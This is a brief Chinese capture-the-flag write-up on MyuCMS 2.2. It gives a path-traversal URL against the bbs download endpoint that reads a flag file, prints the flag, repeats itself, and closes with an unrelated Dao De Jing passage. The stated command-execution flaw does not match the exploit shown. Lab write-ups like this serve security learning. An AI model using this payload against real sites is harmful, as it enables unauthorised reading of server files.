一、题目
靶标介绍:
MyuCMS开源内容管理系统,采用ThinkPHP开发而成的社区商城聚合,插件,模板,轻便快捷容易扩展 其2.2版本中admin.php/config/add方法存在任意命令执行漏洞.
进入题目:
exp:
url/index.php/bbs/index/download?url=../../../../../flag&local=1&name
查看flag:
flag{2d3ea261-8b0c-488b-b15d-5fceba2fa1b6}
靶标介绍:
MyuCMS开源内容管理系统,采用ThinkPHP开发而成的社区商城聚合,插件,模板,轻便快捷容易扩展 其2.2版本中admin.php/config/add方法存在任意命令执行漏洞.
进入题目:
exp:
url/index.php/bbs/index/download?url=../../../../../flag&local=1&name查看flag:
flag{2d3ea261-8b0c-488b-b15d-5fceba2fa1b6}
道可道,非常道;名可名,非常名。 无名,天地之始,有名,万物之母。 故常无欲,以观其妙,常有欲,以观其徼。 此两者,同出而异名,同谓之玄,玄之又玄,众妙之门。